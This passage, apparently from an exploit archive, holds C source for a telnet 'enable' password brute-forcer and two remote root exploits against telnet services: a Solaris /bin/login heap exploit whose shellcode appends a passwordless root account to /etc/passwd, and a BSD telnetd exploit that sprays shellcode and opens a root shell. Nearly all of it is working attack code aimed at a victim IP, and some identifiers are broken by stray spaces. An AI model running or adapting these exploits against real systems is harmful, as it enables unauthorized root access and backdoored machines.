(void)fseek(passlist, 0L, SEEK_END); // cazz questo e' uno smanettamento mentale
password = malloc(ftell(passlist)); // per fare allocare solo la memoria giusta x la passlist :P
if(password == NULL) {
printf("%s sorry, can't allocate memory for passlist. buy more ram or cut the passlist\n\033[0m\n",BOX);
exit(0);
}
(void)fseek(passlist, 0L, SEEK_SET);
while (!feof(passlist)) {
fgets(buf, 32, passlist);
if (buf[0] == '#' || buf[0] == '\n') continue;
for (i = 0; i < strlen(buf); i++)
if (buf[i] == '\n') buf[i] = '\0';
password[x] = malloc(32);
strcpy(password[x], buf);
memset(buf, 0, 32);
x++;
}
password[x] = 0x0;
fclose(passlist);
if(x<4) { printf("%s sorry, but passlist must contain at least 3 passwords. leaving \n\033[0m\n",BOX); exit(0); }
}
int brute() { // there is a stupid error... the last password is tryed 2 times... must be fixed... ;)
char *input = malloc(100);
int N;
bzero(input,100);
write(sock_stat,"enable",6);
write(sock_stat,"\r\n",2);
while(1) {
while(read(sock_stat,input,100)>0) {
if(n==x) { printf("%s %i passwords tried. no valid password found in the passlist\n\033[0m\n",BOX,n-1); exit(0); }
if(n+1==x) break;
if(strstr(input,"assword:")||strstr(input,"#")||strstr(input,">")) break;
bzero(input,100);
}
if(strstr(input,"#")) { printf("%s possible password found: %s\n\033[0m\n",BOX,password[n-1]); exit(0); }
if(strstr(input,"assword:")) {
write(sock_stat,password[n],strlen(password[n]));
write(sock_stat,"\r\n",2);
n++;
bzero(input,100);
if(n>1) printf("%s %s... wrong password\n", BOX, password[n-2]); fflush(stdout);
continue;
}
if(strstr(input,">")) {
write(sock_stat,"enable\r\n",8); bzero(input,100);
}
}
}
int main(int argc, char *argv[]) {
int port;
signal(SIGINT, sig);
banner();
if((argc<=3)||(argc>=8)) { usage(argv[0]); exit(0); }
if(!strcmp(argv[2],"-u")) {
if(argc==6) { port=atoi("23"); }
else { port=atoi(argv[6]); } // c'e' uno stupido errore qua di argc che nn ho voglia di trovare
// c'ho cosetta nella testa :?-- Corretto :)
printf("%s\n",BOX);
loadwordlist(argv[5]);
resolve(argv[1]);
sock(host, port);
login(argv[3],argv[4]);
brute();
}
else {
if(argc==4) { port=atoi("23"); }
else { port=atoi(argv[4]); }
printf("%s\n",BOX);
loadwordlist(argv[3]);
resolve(argv[1]);
sock(host, port);
login("n0login",argv[2]);
brute();
}
}
// [2001-01-19]
23 Solaris /bin/login Remote Root Exploit (SPARC/x86)
/*
* 7350963 - /bin/login remote root explot SPARC/x86
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* (C) COPYRIGHT TESO Security, 2001
* All Rights Reserved
*
* bug found by scut 2001/12/20
* thanks to halvar,scut,typo,random,edi,xdr.
* special thanks to security.is.
*
* keep it private!
* don't distribute!
*/
//#define X86_FULL_PACKAGE
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdlib.h>
void usage()
{
printf("usage: ./7350963 ip_of_the_victim\n");
}
void dump_hex(char *str,char *data,int len)
{
int i;
if(str)
{
printf("\n=======%s:%d========\n",str,len);
}
else
{
printf("\n=======================\n");
}
for(i=0; i < len ;i++)
{
printf("x%.2x\n", (data[i]&0xff));
}
printf("\n-----------------------\n");
for(i=0; i < len ;i++)
{
if(data[i]==0x00)
{
printf("|\n");
}
else
{
printf("%c\n",data[i]);
}
}
printf("\n");
fflush(stdout);
}
int send_data(int sock,const char *send_data,int send_len)
{
int wc;
int rc;
char recv_buf[1000];
if(send_data && send_len > 0)
{
wc=send(sock,send_data,send_len,0);
}
rc=recv(sock,recv_buf,sizeof(recv_buf),0);
if(rc > 0)
{
dump_hex("recv",recv_buf,rc);
}
}
int main(int argc,char *argv[])
{
int sock;
struct sockaddr_in address;
int i;
char send_data_1[]=
{
0xff,0xfd,0x03,
0xff,0xfb,0x18,
0xff,0xfb,0x1f,
0xff,0xfb,0x20,
0xff,0xfb,0x21,
0xff,0xfb,0x22,
0xff,0xfb,0x27,
0xff,0xfd,0x05,
0xff,0xfb,0x23
};
char send_data_2[]=
{
0xff,0xfa,0x1f,0x00,0x50,0x00,0x18,
0xff,0xf0,
0xff,0xfc,0x24
};
char send_data_3[]=
{
0xff,0xfd,0x01,
0xff,0xfc,0x01
};
char str_buffer[1024*30];
int str_buffer_pos=0;
char str_end[2]={0xd,0x0};
char *env_str;
int env_str_len;
char env_1[4]={0xff,0xfa,0x18,0x00};
char *terminal_name="xterm-debian";
char env_2[6]={0xff,0xf0,0xff,0xfa,0x23,0x00};
char *display="matter:0.0";
char env_3[7]={0xff,0xf0,0xff,0xfa,0x27,0x00,0x00};
char *display_var="DISPlAY";
char display_delimiter[1]={0x01};
char *display_value="matter:0.0";
char *environ_str;
int environ_str_len;
int env_cur_pos=0;
int env_num;
char env_4[2]={0xff,0xf0};
char exploit_buffer[]="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\\r\n";
char login_buffer[]= "ji1=A ji2=A ji3=A ji4=A ji5=A ji6=A ji7=A ji8=A ji9=Z ji10=z\\\r\n\
ji11=B ji12=A ji13=A ji14=b ji15=A ji16=A ji17=A ji18=A ji19=B ji20=b\\\r\n\
ji21=C ji22=A ji23=A ji24=c ji25=A ji26=A ji27=A ji28=A ji29=C ji30=c\\\r\n\
ji32=D ji32=A ji33=A ji34=d ji35=A ji36=A ji37=A ji38=A ji39=D ji40=d\\\r\n\
ji41=E ji42=A ji43=A ji44=e j";
char realfree_edx[]={0x83,0x83,0x83,0x83}; //0xdf9d6361 <realfree+81>: test $0x1,%dl¸¦ ³Ñ±â±â À§ÇؼÂ*
char login_buffer1[]="=A j";
#ifdef X86_FULL_PACKAGE
char t_delete_edi_plus_0x8[]={0x2f,0x80,0x06,0x08};
#else
char t_delete_edi_plus_0x8[]={0x27,0x80,0x06,0x08};
#endif
char t_delete_edi_plus_0xa[]="=A j";
char t_delete_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
char login_buffer1_0[]="=A ji48=A j ";
#ifdef X86_FULL_PACKAGE
char t_delete_edi_plus_0x20[]={0xf0,0x55,0x6,0x08};
#else
char t_delete_edi_plus_0x20[]={0xe8,0x55,0x6,0x08};
#endif
char login_buffer1_1[]="=\\\r\n\ji51=F ji52=A ji53=A ji54=f ji55=A ji56=A j=iheol i58=";
#ifdef X86_FULL_PACKAGE
char t_delete2_param1[]={0x29,0x80,0x06,0x08};
#else
char t_delete2_param1[]={0x21,0x80,0x06,0x08};
#endif
char login_buffer1_2[]="6=8";
char link_pos[]={0x97,0xff,0xff,0xff,0xff,0xff,0xff};
//ù¹ø° A -1 ÀÓ
char login_buffer2[]="A=AB";
// 0x080654d4->0x080656ac at 0x000054d4: .got ALLOC LOAD DATA HAS_CONTENTS
//0x80655a4 <_GLOBAL_OFFSET_TABLE_+208>: 0xdf9bd0b8 <strncpy>
//(gdb) print/x 0x80655a4 - 0x20
//$1 = 0x8065584
#ifdef X86_FULL_PACKAGE
char t_delete2_edi_plus_0x8[]={0x90,0x55,0x06,0x08}; //strncpy-0x20,ecx
#else
char t_delete2_edi_plus_0x8[]={0x84,0x55,0x06,0x08}; //strncpy-0x20,ecx
#endif
char login_buffer2_0[]="GHIJ";
char t_delete2_edi_plus_0x10[]={0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff};
char login_buffer2_1[]="OPQRSTUVWXYZ";
//0x806810d <inputline+780>: 'A' <repeats 82 times>, "\n"
#ifdef X86_FULL_PACKAGE
char t_delete2_edi_plus_0x20[]={0x06,0x81,0x06,0x08}; //shellcode,eax
#else
char t_delete2_edi_plus_0x20[]={0xfe,0x80,0x06,0x08}; //shellcode,eax
#endif
//0x8067e01 <inputline>: "heowahfoihewobhfoiewhiofhoewhofhoeiwhofwhofhiewwhf oiew
char login_buffer2_2[]="efghijklmnopqrstuvwxyz0123456789A\\\r\n\
jk11=A jm21=C nj31=A jo41=A pi51=A jq61=A jr71=A js81=g jt91=A ju01=A jv11=A
jw21=B jy"; //31=A z";//4=A k2=A k3=A k";
#ifdef X86_FULL_PACKAGE
//char strncpy_src[]={0xf9,0x3b,0x05,0x08};
char strncpy_src[]={0x31,0x80,0x06,0x08};
#else
char strncpy_src[]={0xf1,0x3b,0x05,0x08};
#endif
char env_buffer[]="hi1=A hi2=A hi3=A hi";
char pam_input_output_eax[]={0x48,0x8a,0x06,0x08}; //0x8068a48
char env_buffer0[]="hi5=A hi6=A hi7=A hi";
#ifdef X86_FULL_PACKAGE
char free_dest_buffer[]={0x31,0x80,0x06,0x08};
#else
char free_dest_buffer[]={0x29,0x80,0x06,0x08};
#endif
char env_buffer2[]="zi9=";
#ifdef X86_FULL_PACKAGE
char free_dest_buffer2[]={0x31,0x80,0x06,0x08};
#else
char free_dest_buffer2[]={0x29,0x80,0x06,0x08};
#endif
char exp_buffer0[]="hello";
char jmp_code[]={0xeb,0xc};
char exp_buffer1[]="\\\r\nhhhhhhhhhhh";
char shellcode[]=
{
0xeb,0x1d,
0x5e, /*popl %esi*/
0x33,0xc0, /*xorl %eax,%eax*/
0x50, /*pushl %eax - ,0x0*/
#ifdef X86_FULL_PACKAGE
0x68,0x46,0x81,0x06,0x08,
0x68,0x43,0x81,0x06,0x08,
0x68,0x40,0x81,0x06,0x08,
0x68,0x38,0x81,0x06,0x08,
#else
0x68,0x3e,0x81,0x06,0x08,
0x68,0x3b,0x81,0x06,0x08,
0x68,0x38,0x81,0x06,0x08,
0x68,0x30,0x81,0x06,0x08,
#endif
#ifdef X86_FULL_PACKAGE
0xe8,0x25,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/
#else
0xe8,0x2e,0xa0,0xfe,0xff,0xff, /*call execve: 0xfffe9fee*/
#endif
0xe8,0xde,0xff,0xff,0xff,0xff,0xff,0xff /*call again*/
};
char exec_argv0[]="/bin/sh";
char exec_argv1[]="sh";
char exec_argv2[]="-c";
char exec_argv3[]="/bin/echo met::463:1::/:/bin/sh>>/etc/passwd;";
//"/bin/echo met::11652::::::>>/etc/shadow;";
//"/bin/finger @210.111.69.137";
//211.59.123.155";
char extra_buffer[]="hihihiifhewiohfiowehfiohweiofhiowehfoihefe\\\r\n";
#ifdef X86_FULL_PACKAGE
char free_dest_buffer3[]={0x31,0x80,0x06,0x08};
#else
char free_dest_buffer3[]={0x29,0x80,0x06,0x08};
#endif
char env_buffer5[]="70=b \\\r\n\hr371=b hs372=";
char pam_input_output_eax2[]={0xf5,0x3b,0x05,0x08};
char env_buffer5_0[]="473=";
char pam_get_authtok_eax[]={0xf6,0x3b,0x05,0x08}; //0x8053bfa Àӽú¯Åë
char pam_get_data_esi[]={0xa8,0xb1,0x06,0x08};//0x806b1a8 display=""; terminal_name="";
if (argc < 2)
{
usage();
exit(-1);
}
env_str_len= sizeof(env_1) + strlen(terminal_name) + sizeof(env_2)+strlen(display) + sizeof(env_3) + strlen(display_var) + sizeof(display_delimiter) + strlen(display_value) + sizeof(env_4);
env_str=(char *)calloc(1,env_str_len);
if(env_str)
{
env_cur_pos=0;
memcpy(env_str+env_cur_pos,env_1,sizeof(env_1));
env_cur_pos += sizeof(env_1);
memcpy(env_str + env_cur_pos,terminal_name,strlen(terminal_name));
env_cur_pos += strlen(terminal_name);
memcpy(env_str + env_cur_pos,env_2,sizeof(env_2));
env_cur_pos += sizeof(env_2);
memcpy(env_str + env_cur_pos,display,strlen(display));
env_cur_pos += strlen(display);
memcpy(env_str + env_cur_pos,env_3,sizeof(env_3));
env_cur_pos += sizeof(env_3);
memcpy(env_str + env_cur_pos,display_var,strlen(display_var));
env_cur_pos += strlen(display_var);
memcpy(env_str + env_cur_pos,display_delimiter,sizeof(display_delim iter));
env_cur_pos+=sizeof(display_delimiter);
memcpy(env_str + env_cur_pos,display_value,strlen(display_value));
env_cur_pos += strlen(display_value);
memcpy(env_str + env_cur_pos,env_4,sizeof(env_4));
env_cur_pos += sizeof(env_4);
}
/*socket operation*/
sock=socket(AF_INET,SOCK_STREAM,0);
if(sock < 0)
{
perror("socket");
return -1;
}
address.sin_family=AF_INET;
address.sin_port=htons(23);
//inet_pton(AF_INET,argv[1],&address.sin_addr); //on some system no inet_pton exists
address.sin_addr.s_addr=inet_addr(argv[1]);
if(connect(sock,(struct sockaddr *)&address,sizeof(address))<0)
{
perror("connect");
return -1;
}
send_data(sock,NULL,0);
send_data(sock,send_data_1,sizeof(send_data_1));
send_data(sock,send_data_2,sizeof(send_data_2));
//dump_hex("env",env_str,env_cur_pos);
send_data(sock,env_str,env_cur_pos);
free(env_str);
send_data(sock,send_data_3,sizeof(send_data_3));
str_buffer_pos=0;
memcpy(str_buffer + str_buffer_pos,exploit_buffer,strlen(exploit_buffe r));
str_buffer_pos += strlen(exploit_buffer);
strcpy(str_buffer + str_buffer_pos,login_buffer);
str_buffer_pos += strlen(login_buffer);
memcpy(str_buffer + str_buffer_pos,realfree_edx,sizeof(realfree_edx));
str_buffer_pos += sizeof(realfree_edx);
strcpy(str_buffer + str_buffer_pos,login_buffer1);
str_buffer_pos += strlen(login_buffer1);
memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x8,sizeof(t_dele te_edi_plus_0x8));
str_buffer_pos += sizeof(t_delete_edi_plus_0x8);
memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0xa,strlen(t_dele te_edi_plus_0xa));
str_buffer_pos += strlen(t_delete_edi_plus_0xa);
memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x10,sizeof(t_del ete_edi_plus_0x10));
str_buffer_pos += sizeof(t_delete_edi_plus_0x10);
strcpy(str_buffer + str_buffer_pos,login_buffer1_0);
str_buffer_pos += strlen(login_buffer1_0);
memcpy(str_buffer + str_buffer_pos,t_delete_edi_plus_0x20,sizeof(t_del ete_edi_plus_0x20));
str_buffer_pos += sizeof(t_delete_edi_plus_0x20);
strcpy(str_buffer + str_buffer_pos,login_buffer1_1);
str_buffer_pos += strlen(login_buffer1_1);
memcpy(str_buffer + str_buffer_pos,t_delete2_param1,sizeof(t_delete2_p aram1));
str_buffer_pos += sizeof(t_delete2_param1);
strcpy(str_buffer + str_buffer_pos,login_buffer1_2);
str_buffer_pos += strlen(login_buffer1_2);
memcpy(str_buffer + str_buffer_pos,link_pos,sizeof(link_pos));
str_buffer_pos += sizeof(link_pos);
strcpy(str_buffer + str_buffer_pos,login_buffer2);
str_buffer_pos += strlen(login_buffer2);
memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x8,sizeof(t_del ete2_edi_plus_0x8));
str_buffer_pos += sizeof(t_delete2_edi_plus_0x8);
strcpy(str_buffer + str_buffer_pos,login_buffer2_0);
str_buffer_pos += strlen(login_buffer2_0);
memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x10,sizeof(t_de lete2_edi_plus_0x10));
str_buffer_pos += sizeof(t_delete2_edi_plus_0x10);
strcpy(str_buffer + str_buffer_pos,login_buffer2_1);
str_buffer_pos += strlen(login_buffer2_1);
memcpy(str_buffer + str_buffer_pos,t_delete2_edi_plus_0x20,sizeof(t_de lete2_edi_plus_0x20));
str_buffer_pos += sizeof(t_delete2_edi_plus_0x20);
strcpy(str_buffer + str_buffer_pos,login_buffer2_2);
str_buffer_pos += strlen(login_buffer2_2);
memcpy(str_buffer + str_buffer_pos,strncpy_src,sizeof(strncpy_src));
str_buffer_pos += sizeof(strncpy_src);
memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer));
str_buffer_pos += strlen(env_buffer);
memcpy(str_buffer + str_buffer_pos,pam_input_output_eax,sizeof(pam_inp ut_output_eax));
str_buffer_pos += sizeof(pam_input_output_eax);
memcpy(str_buffer + str_buffer_pos,env_buffer,strlen(env_buffer0));
str_buffer_pos += strlen(env_buffer0);
memcpy(str_buffer + str_buffer_pos,free_dest_buffer,sizeof(free_dest_b uffer));
str_buffer_pos += sizeof(free_dest_buffer);
memcpy(str_buffer + str_buffer_pos,env_buffer2,strlen(env_buffer2));
str_buffer_pos += strlen(env_buffer2);
memcpy(str_buffer + str_buffer_pos,free_dest_buffer2,sizeof(free_dest_ buffer2));
str_buffer_pos += sizeof(free_dest_buffer2);
strcpy(str_buffer + str_buffer_pos,exp_buffer0);
str_buffer_pos += strlen(exp_buffer0);
memcpy(str_buffer + str_buffer_pos,jmp_code,sizeof(jmp_code));
str_buffer_pos += sizeof(jmp_code);
strcpy(str_buffer + str_buffer_pos,exp_buffer1);
str_buffer_pos += strlen(exp_buffer1);
memcpy(str_buffer + str_buffer_pos,shellcode,sizeof(shellcode));
str_buffer_pos += sizeof(shellcode);
strcpy(str_buffer + str_buffer_pos,exec_argv0);
str_buffer_pos += strlen(exec_argv0)+1;
strcpy(str_buffer + str_buffer_pos,exec_argv1);
str_buffer_pos += strlen(exec_argv1)+1;
strcpy(str_buffer + str_buffer_pos,exec_argv2);
str_buffer_pos += strlen(exec_argv2)+1;
strcpy(str_buffer + str_buffer_pos,exec_argv3);
str_buffer_pos += strlen(exec_argv3)+1;
memcpy(str_buffer + str_buffer_pos,str_end,strlen(str_end));
str_buffer_pos += strlen(str_end);
{
char buf[100];
fgets(buf,100,stdin);
}
printf("sending login!\n");
fflush(stdout);
send_data(sock,str_buffer,str_buffer_pos);
send_data(sock,NULL,0);
printf("\n\n\npress return to send password\n...");
{
char buf[100];
fgets(buf,100,stdin);
}
send_data(sock,str_buffer,strlen(str_buffer)+1);
printf("\n\n\nwaiting for the realfree & t_delete to be called!\n...\n\n");
fflush(stdout);
sleep(30);
return 42;
}
// [2001-12-20]
23 BSD (telnetd) Remote Root Exploit
/* 7350854 - x86/bsd telnetd remote root exploit
*
* TESO CONFIDENTIAL - SOURCE MATERIALS
*
* This is unpublished proprietary source code of TESO Security.
*
* The contents of these coded instructions, statements and computer
* programs may not be disclosed to third parties, copied or duplicated in
* any form, in whole or in part, without the prior written permission of
* TESO Security. This includes especially the Bugtraq mailing list, the
* www.hack.co.za website and any public exploit archive.
*
* (C) COPYRIGHT TESO Security, 2001
* All Rights Reserved
*
************************************************** ***************************
* bug found by scut 2001/06/09
* further research by smiler, zip, lorian and me.
* thanks to zip's cool friend for giving me a testbed to play on
*
* tested against: BSDI BSD/OS 4.1
* NetBSD 1.5
* FreeBSD 3.1
* FreeBSD 4.0-REL
* FreeBSD 4.2-REL
* FreeBSD 4.3-BETA
* FreeBSD 4.3-STABLE
* FreeBSD 4.3-RELEASE
*
*/
#define VERSION "0.0.7"
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <arpa/telnet.h>
#include <netdb.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
/* global variables, uhhohh!
*/
int mode = 16;
int num = 245;
int pop = 31500; /* puts code at 0x08fdff0a */
int bs = 1; /* buffer start */
int num34 = 244;
int pop34 = 71833; /* puts code at 0x0a0d08fe */
int bs34 = 0;
int walk; /* populator walker */
int force = 0; /* force exploitation */
int checkonly = 0; /* check telnetd only */
void usage (char *progname);
int xp_check (int fd);
void xp_pop (int fd);
void xp_shrinkwin (int fd);
void xp_setenv (int fd, unsigned char *var, unsigned char *val);
void xp (int fd);
void shell (int sock);
void hexdump (char *desc, unsigned char *data, unsigned int amount);
/* imported from shellkit */
unsigned long int random_get (unsigned long int low, unsigned long int high);
void random_init (void);
int bad (unsigned char u);
int badstr (unsigned char *code, int code_len, unsigned char *bad,
int bad_len);
unsigned long int x86_nop_rwreg (void);
unsigned long int x86_nop_xfer (char *xferstr);
unsigned int x86_nop (unsigned char *dest, unsigned int dest_len,
unsigned char *bad, int bad_len);
#define BSET(dest, len, val, bw) { \
dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \
dest |= val << (8 - bw - len); /* set value bits */ \
bw += len; \
}
/* imported from network.c */
#define NET_CONNTIMEOUT 60
int net_conntimeout = NET_CONNTIMEOUT;
unsigned long int net_resolve (char *host);
int net_connect (struct sockaddr_in *cs, char *server,
unsigned short int port, int sec);
/* x86/bsd PIC portshell shellcode
* by lorian/teso
* port 0x4444 (might want to change it here)
*/
unsigned char x86_bsd_portshell[] =
"\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53"
"\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5"
/* ^^ ^^ port */
"\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a"
"\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a"
"\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd"
"\x80";
/* x86/bsd PIC execve shellcode
* by lorian/teso
*/
unsigned char x86_bsd_execvesh[] =
"\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80";
/* x86/bsd(i)+solaris execve shellcode
* by lorian/teso
*/
unsigned char x86_bsd_compaexec[] =
"\xbf\xee\xee\xee\x08\xb8\xff\xf8\xff\x3c\xf7\xd0"
"\xfd\xab\x31\xc0\x99\xb0\x9a\xab\xfc\xab\xb0\x3b"
"\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
"\xe3\x52\x53\x89\xe1\x52\x51\x53\xff\xd7";
unsigned char * shellcode = x86_bsd_compaexec;
#define COL 55
void
usage (char *progname)
{
fprintf (stderr, "usage: %s [-n <num>] [-c] [-f] <ip>\n\n", progname);
fprintf (stderr, "-n num\tnumber of populators, for testing purposes\n"
"-c\tcheck exploitability only, do not exploit\n"
"-f\tforce mode, override check results\n\n");
fprintf (stderr, "WARNING: this is no easy exploit, we have to get things tightly aligned and\n"
"send 16/34mb of traffic to the remote telnet daemon. it might not be able to\n"
"take that, or it will take very long for it (> 1h). beware.\n\n");
fprintf (stderr, "tested:\tFreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE \n"
"\tNetBSD 1.5\n"
"\tBSDI BSD/OS 4.1\n\n");
exit (EXIT_FAILURE);
}
int
main (int argc, char *argv[])
{
char c;
char * progname;
char * dest;
int i, j, fd,
dots = 0;
int popc;
struct timeval start,
cur;
unsigned long long int g_pct, /* gaussian percentage */
g_all; /* gaussian overall */
fprintf (stderr, "7350854 - x86/bsd telnetd remote root\n"
"by zip, lorian, smiler and scut.\n\n");
progname = argv[0];
if (argc < 2)
usage (progname);
while ((c = getopt (argc, argv, "n:cf")) != EOF) {
switch (c) {
case 'n':
num = atoi (optarg);
break;
case 'c':
checkonly = 1;
break;
case 'f':
force = 1;
break;
default:
usage (progname);
break;
}
}
dest = argv[argc - 1];
if (dest[0] == '-')
usage (progname);
fd = net_connect (NULL, dest, 23, 20);
if (fd <= 0) {
fprintf (stderr, "failed to connect\n");
exit (EXIT_FAILURE);
}
random_init ();
if (xp_check (fd) == 0 && force == 0) {
printf ("aborting\n");
#ifndef DEBUG
exit (EXIT_FAILURE);
#endif
}
close (fd);
if (checkonly)
exit (EXIT_SUCCESS);
fd = net_connect (NULL, dest, 23, 20);
if (fd <= 0) {
fprintf (stderr, "failed to connect the second time\n");
exit (EXIT_FAILURE);
}
printf ("\n################################################ #############################\n\n");
printf ("ok baby, times are rough, we send %dmb traffic to the remote\n"
"telnet daemon process, it will spill badly. but then, there is no\n"
"other way, sorry...\n\n", mode);
#ifdef DEBUG
getchar ();
#endif
printf ("## setting populators to populate heap address space\n");
g_all = ((unsigned long long int)(pop / 2)) *
((unsigned long long int)(pop + 1));
g_pct = 0;
printf ("## number of setenvs (dots / network): %d\n", pop);
printf ("## number of walks (percentage / cpu): %Lu\n", g_all);
printf ("##\n");
printf ("## the percentage is more realistic than the dots ;)\n");
printf ("\n");
printf ("percent |");
popc = pop / COL;
for (i = pop / popc ; i >= 0 ; --i)
printf ("-");
printf ("| ETA |\n");
gettimeofday (&start, NULL);
for (walk = 0 ; walk < pop ; ++walk) {
xp_pop (fd);
g_pct += walk;
if (walk % popc == 0)
dots += 1;
if (walk % 200 == 0) {
int pct;
float pct_f;
unsigned long int diff;
pct = (int) ((g_pct * 100) / g_all);
pct_f = g_pct * 100;
pct_f /= (float) g_all;
/* calculate difference not caring about accuracy */
gettimeofday (&cur, NULL);
diff = cur.tv_sec - start.tv_sec;
printf ((pct == 100) ? "\r%3.2f%% |" : ((pct / 10) ?
"\r %2.2f%% |" : "\r %1.2f%% |"), pct_f);
for (j = 0 ; j < dots ; ++j)
printf (".");
for ( ; j <= COL ; ++j)
printf (" ");
if (pct != 0) {
diff = (int) ((((float)(100 - pct_f)) /
(float) pct_f) * diff);
printf ("| %02lu:%02lu:%02lu |",
diff / 3600, (diff % 3600) / 60,
diff % 60);
} else {
printf ("| --:--:-- |");
}
fflush (stdout);
}
}
printf ("\n\n");
printf ("## sleeping for 10 seconds to let the process recover\n");
sleep (10);
#ifdef DEBUG
getchar ();
#endif
/* return into 0x08feff0a */
xp (fd);
sleep (1);
printf ("## ok, you should now have a root shell\n");
printf ("## as always, after hard times, there is a reward...\n");
printf ("\n\ncommand: ");
fflush (stdout);
shell (fd);
exit (EXIT_SUCCESS);
}
void
xp (int fd)
{
int n;
unsigned char buf[2048];
/* basic overflow */
for (n = bs ; n < sizeof (buf) ; ++n)
buf[n] = (n - bs) % 2 ? '\xf6' : '\xff';
/* some nifty alignment */
buf[0] = '\xff'; /* IAC */
buf[1] = '\xf5'; /* AO */
if (mode == 16) {
buf[2] = '\xff'; /* IAC */
buf[3] = '\xfb'; /* WILL */
buf[4] = '\x26'; /* ENCRYPTION */
}
/* force 0x08feff0a as return */
buf[num++] = '\xff';
buf[num++] = '\xfb';
buf[num++] = '\x08';
/* and the output_encrypt overwrite action, yay! */
buf[num++] = '\xff';
buf[num++] = '\xf6';
/* XXX: should not fail here, though we should better loop and check */
n = send (fd, buf, num, 0);
if (n != num) {
perror ("xp:send");
}
}
#ifdef INSANE_MIND
void
xp_shrinkwin (int fd)
{
int n;
int iobc;
int p = 0;
unsigned char buf[2048];
char c;
int val;
int len;
for (n = 0 ; n < sizeof (buf) ; ++n)
buf[n] = n % 2 ? '\xf6' : '\xff';
len = sizeof (val);
getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len);
printf ("SO_SNDLOWAT = %d\n", val);
val = 1;
printf ("setsockopt: %s\n",
setsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, sizeof(val)) ?
"FAILED" : "SUCCESS");
val = 1234;
getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len);
printf ("SO_SNDLOWAT = %d\n", val);
getchar();
while (1) {
if (p > 105)
c = getchar();
if (c == 'r') {
getchar();
read (fd, &buf[1024], 384);
} else if (c == 'o') {
getchar();
send (fd, "7", 1, MSG_OOB);
} else if (c != 'r') {
usleep(100000);
n = send (fd, buf, 112, 0);
ioctl (fd, FIONREAD, &iobc);
len = sizeof (val);
getsockopt (fd, SOL_SOCKET, SO_RCVBUF, &val, &len);
printf ("%02d. send: %d local: %d/%d (%d left)\n",
++p, n, iobc, val, val - iobc);
}
}
}
#endif
/* xp_pop - populator function
*
* causes remote telnet daemon to setenv() variables with our content, populating
* the heap with shellcode. this will get us more nopspace and place our shellcode
* where the nice addresses are, that we can create by writing telnet option
* strings.
*
* XXX: there seems to be a maximum size for the environment value you can set,
* which is 510. we use 496 bytes for nopspace and shellcode therefore.
* should work, rather similar to tsig tcp/malloc exploitation. -sc
*/
void
xp_pop (int fd)
{
unsigned char var[16];
unsigned char storebuf[496];
sprintf (var, "%06x", walk);
#ifdef DEBUG
memset (storebuf, '\xcc', sizeof (storebuf));
#else
/* memset (storebuf, '\x90', sizeof (storebuf)); */
x86_nop (storebuf, sizeof (storebuf), "\x00\x01\x02\x03\xff", 5);
memcpy (storebuf + sizeof (storebuf) - strlen (shellcode) - 1,
shellcode, strlen (shellcode));
#endif
storebuf[sizeof (storebuf) - 1] = '\0';
xp_setenv (fd, var, storebuf);
}
void
xp_setenv (int fd, unsigned char *var, unsigned char *val)
{
int n = 0;
unsigned char buf[2048];
buf[n++] = IAC;
buf[n++] = SB;
buf[n++] = TELOPT_NEW_ENVIRON;
buf[n++] = TELQUAL_IS;
buf[n++] = ENV_USERVAR;
/* should not contain < 0x04 */
while (*var) {
if (*var == IAC)
buf[n++] = *var;
buf[n++] = *var++;
}
buf[n++] = NEW_ENV_VALUE;
while (*val) {
if (*val == IAC)
buf[n++] = *val;
buf[n++] = *val++;
}
buf[n++] = IAC;
buf[n++] = SE;
if (send (fd, buf, n, 0) != n) {
perror ("xp_setenv:send");
exit (EXIT_FAILURE);
}
}
int
xp_check (int fd)
{
int n;
unsigned int expect_len = 15;
unsigned char expected[] =
"\x0d\x0a\x5b\x59\x65\x73\x5d\x0d\x0a\xff\xfe\x08\x ff\xfd\x26";
/* \r \n [ Y e s ] \r \n IAC DONT 08 IAC DO 26*/
unsigned int additional_len = 8;
unsigned char additional[] =
"\xff\xfa\x26\x01\x01\x02\xff\xf0";
/*IAC SB ENC ........... IAC SE */
unsigned char buf[128];
read (fd, buf, sizeof (buf));
n = 0;
buf[n++] = IAC; /* 0xff */
buf[n++] = AYT; /* 0xf6 */
buf[n++] = IAC; /* 0xff */
buf[n++] = WILL; /* 0xfb */
